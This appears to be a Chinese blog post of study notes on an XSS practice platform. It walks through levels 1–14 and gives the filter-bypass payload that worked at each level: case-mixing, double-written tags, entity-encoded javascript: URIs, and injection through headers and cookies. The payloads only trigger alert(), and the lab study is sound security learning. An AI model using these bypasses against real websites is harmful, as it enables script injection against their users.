XSS学习(绕过)

学习平台:xss.tesla-space.com

XSS学习(绕过)

level1

应该没有过滤
https://xss.tesla-space.com/level1.php?name=<script>alert(1);</script>

level2

先试一下<script>alert(1);</script>
需要闭合
' "><script>alert(1);</script>

level3

先试一下' "><script>alert(1);</script>
不行,多试一下,发现单引号没转义
可以用onfocus
发现在最右边加了个单引号,因此需要在alert左边加一个单引号闭合
'onfocus='alert(1)

level4

找一些常用的试一下发现把<>删了
发现和level3比,本题用"闭合"onfocus="alert(1)

level5

试了一下发现改了script,而且需要闭合前面的value

试一下大小写绕过,发现不行
不用srcipt,改用a' "><a href="javascript:alert()">aa</a>

level6

把level5的答案输入,发现herf也被禁用了
' "><sCripT>alert(1);</sCripT>大小写绕过居然可以了

level7

输入level6的答案,发现把script删除了

明显的双写绕过' "><sCrsCripTipT>alert(1);</sCsCripTripT>

level8

应该是要构造herf内容,发现直接输入javascript不行,大小写也不行
可以对javasricpt进行编码,&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert()">

level9

用上题的答案输入提示不合法
猜测需要包含http之类的一个正常网站
发现这种链接点击后是没用的,需要把这个正常网站用/**/注释掉,&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert();/*http://www.baidu.com*/

level10

发现有三个隐藏的input
对这三个变量赋值,看看哪个能生效,看来只有t_sort有用
input中的onfocus之前遇到过,这题特殊的地方在于input属性是隐藏的,可以在输入里重新给type赋值https://xss.tesla-space.com/level10.php?t_link=111&t_history=222&t_sort="onfocus="alert(1)" type=button

level11

试了t_sort发现不行,注意到t_ref是第十关的有关信息,可以抓个包
一步一步更改referer字段

level12

12获取的应该是11User-Anget的值
在此处注入

level13

一眼cookie,需要给变量user赋值

level14

后面的都打不开了,淦

相关推荐
STLearner8 小时前
AI论文速读 | QuitoBench:支付宝高质量开源时间序列预测基准测试集
大数据·论文阅读·人工智能·深度学习·学习·机器学习·开源
椰羊~王小美8 小时前
除了前端 JS 配置的国际化,对于 JS 没覆盖到的文本,怎么实现国际化
前端·javascript·状态模式
AC赳赳老秦8 小时前
DBA 专属方案:用 OpenClaw 实现 SQL 语句优化、慢查询分析、数据库备份巡检全自动化
服务器·前端·数据库·ffmpeg·自动化·deepseek·openclaw
醇氧9 小时前
WSL2(Windows Subsystem for Linux ) 从入门到实践指南
linux·运维·服务器·windows·学习
燐妤9 小时前
前端HTML编程1:初识html
前端·html5
xiaoye37089 小时前
java接口文档工具 swagger2和swagger3对比
java·服务器·前端
tongyiixiaohuang9 小时前
基于轻易云的数据集成,实现企业系统间灵活对接
java·前端·数据库
哥本哈士奇9 小时前
Power BI学习笔记第17篇:Power BI Dashboard 常用布局方案推荐
前端·powerbi
阿荻在肝了9 小时前
Agent学习七:LangGraph学习-持久化与记忆二
python·学习·agent
军军君019 小时前
数字孪生监控大屏实战模板:固体颗粒物监管平台
前端·javascript·vue.js·typescript·前端框架·echarts·less